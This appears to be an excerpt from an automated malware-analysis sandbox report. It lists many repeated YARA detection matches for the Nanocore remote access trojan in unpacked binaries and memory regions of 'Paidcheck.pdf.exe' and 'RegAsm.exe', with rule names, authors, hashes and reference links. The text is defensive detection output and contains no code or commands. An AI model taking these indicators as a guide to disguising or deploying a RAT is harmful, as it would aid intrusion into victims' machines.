      Source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b20000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b20000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6ad0000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ad0000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3bde5cf.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3bde5cf.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f2f2de.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f2f2de.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.2c06b78.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.2c06b78.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.2c57ec4.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.2c57ec4.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b70000.37.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b70000.37.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.6ae0000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ae0000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3be81d4.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3be81d4.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b30000.36.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b30000.36.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b70000.37.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b70000.37.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.2c6410c.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.2c6410c.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.2c78748.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.2c78748.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.2c57ec4.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.2c57ec4.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489824086.0000000006B70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489824086.0000000006B70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489650753.0000000006B00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489650753.0000000006B00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.489080890.0000000006540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489080890.0000000006540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.489200537.0000000006A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489200537.0000000006A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.489750000.0000000006B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489750000.0000000006B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489515474.0000000006AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489515474.0000000006AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489556083.0000000006AD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
